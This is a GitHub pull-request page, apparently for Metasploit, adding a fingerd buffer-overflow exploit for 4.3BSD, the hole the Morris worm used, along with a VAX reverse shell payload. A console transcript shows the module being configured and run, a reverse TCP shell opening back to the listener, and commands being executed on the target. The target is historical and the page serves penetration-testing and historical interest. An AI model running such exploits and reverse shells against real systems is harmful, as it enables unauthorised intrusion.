Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Morris worm fingerd exploit and VAX reverse shell #10700

Merged
merged 7 commits into from
Nov 2, 2018

Conversation

wvu
Copy link
Contributor

@wvu wvu commented Sep 25, 2018

msf5 exploit(bsd/finger/morris_fingerd_bof) > options

Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
   RPORT   79               yes       The target port (TCP)


Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85


msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500

whoami
nobody
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?

@wvu wvu added module blocked Blocked by one or more additional tasks feature payload labels Sep 25, 2018
@wvu wvu force-pushed the feature/fingerd branch 2 times, most recently from 9905d2e to 293db39 Compare September 25, 2018 16:21
@wvu wvu added the needs-docs label Sep 25, 2018
@busterb
Copy link
Member

busterb commented Sep 25, 2018

This could definitely use some docs to explain historical significance.

@h00die
Copy link
Contributor

h00die commented Sep 25, 2018

Meant to post this earlier... +10 for awesome commenting, not only for jokes but also insight.

@wvu wvu force-pushed the feature/fingerd branch 2 times, most recently from d367877 to 3fb1929 Compare September 25, 2018 20:22
@wvu wvu force-pushed the feature/fingerd branch 3 times, most recently from c06441e to c92605b Compare October 4, 2018 07:45
@wvu wvu removed the needs-docs label Oct 4, 2018
@wvu wvu force-pushed the feature/fingerd branch 7 times, most recently from 713d7ed to ae6039d Compare October 5, 2018 19:41
@wvu wvu force-pushed the feature/fingerd branch 6 times, most recently from 33ea8b0 to c80bc1f Compare October 12, 2018 17:52
@wvu wvu force-pushed the feature/fingerd branch 3 times, most recently from 4066e26 to 2b9b859 Compare October 20, 2018 06:16
@wvu wvu force-pushed the feature/fingerd branch 5 times, most recently from 5e7ad89 to b79dd74 Compare October 22, 2018 20:57
@wvu wvu removed the blocked Blocked by one or more additional tasks label Oct 29, 2018
@busterb busterb self-assigned this Nov 2, 2018
@busterb busterb merged commit f40647b into rapid7:master Nov 2, 2018
@busterb
Copy link
Member

busterb commented Nov 2, 2018

Release Notes

This adds a module exploiting a stack buffer overflow in fingerd on 4.3BSD. This vulnerability was exploited by the Morris worm in 1988-11-02.

@wvu wvu deleted the feature/fingerd branch November 2, 2018 17:20
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

4 participants